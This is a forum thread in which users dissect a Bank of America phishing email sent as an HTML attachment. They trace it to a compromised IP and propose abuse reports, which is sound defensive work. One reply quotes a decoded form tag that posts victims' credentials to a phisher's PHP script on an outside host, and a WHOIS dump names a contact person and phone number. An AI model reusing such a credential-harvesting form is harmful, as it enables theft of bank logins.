how-to block ads
|
Doctor Four
My other vehicle is a TARDIS
Premium
join:2000-09-05
Dallas, TX
 ·AT&T U-Verse
| [Phish] Curious BofA phish - manual input found no URLs
Any idea how I can get this one to properly submit to Phishtracker? It was one impersonating Bank Of America, and instead of a clickable link or image in the email, there was only an HTML attachment. At the beginning of this and in the middle of the body there is some obfuscated javascript, and apparently the phish also contains some method for randomly varying the URL. This leads me to believe it is not only a Rock Phish, but Fast Flux as well.
I have posted the entire email as a text file for anyone who can parse it so Phishtracker will accept it.
--
"The trouble with computers, of course, is that they are very sophisticated idiots." - Doctor Who (from Robot)
| |
nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
·AT&T U-Verse
 ·AT&T Midwest
| The phish contains obfuscated javascript, making it difficult to read.
I saved just the local part into a local file with name "x.html". Then I browsed to that file with firefox.
The page displayed contains a form for submitting credentials. The form is part of the email text, not from an external phishing site. According to firefox, the completed form is to be posted to
http://jajo-raq.signet.nl/libImage/demo.php
When I try that link (browsing to that link), I am redirected to a real BofA web site.
I did not try submitting to phishtracker, since there was no visible link. If I really wanted to submit, I would have to modify the message to add a line containing that link. It's probably not worth the trouble since the details are in this thread.
--
AT&T dsl; Speedstream 5100b modem; Zyxel NBG334W router; openSuSE 11.0; firefox 3.0.11 | |
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
| reply to Doctor Four
The embedded form in that BOA phishing email, which shows being originally copied and saved from: >https://onlineeast.bankofamerica.com/cgi-bin/ias/4KT s2fjNOSVa4JgTQE9WI4BvbjhaFHngFjech7og29088/1/bofa/ibd/IAS/presentation/GotoResetPasscodeWithPinPage
As nwrickert  noted, the submit button will activate a php script demo.php located at >http://jajo-raq.signet.nl/libImage/demo.php which will process the victim's data, generally by emailing it to the phisher, or storing it in a local file.
The unescaped javascript:
Decodes to:
(">form method="POST" action=">http://jajo-raq.signet.nl/libImage/demo.php">
jajo-raq.signet.nl: »jajo-raq.signet.nl appears to be a home page for sites hosted in the Netherlands on signet.nl »www.signet.nl/ sending a complaint to abuse[@]signet.nl to cancel the account.
Also, the phishing email appears to have originated from a compromised IP 198.60.105.201 in Colorado.
NetRange: 198.60.105.0 - 198.60.105.255
CIDR: 198.60.105.0/24
NetName: ZENEZ
NetHandle: NET-198-60-105-0-1
Parent: NET-198-59-0-0-1
NetType: Reassigned
Comment:
RegDate: 1994-10-21
Updated: 1994-10-21
RTechHandle: BLG-ARIN
RTechName: Gerber, Boyd Lynn
RTechPhone: +1-801-250-0795
RTechEmail:
OrgTechHandle: BLG-ARIN
OrgTechName: Gerber, Boyd Lynn
OrgTechPhone: +1-801-250-0795
OrgTechEmail: gerberb[@]zenez.com
And was relayed via a compromised email account on a server in Spain belonging to lontana-sureste.com
MGD | |
-
|
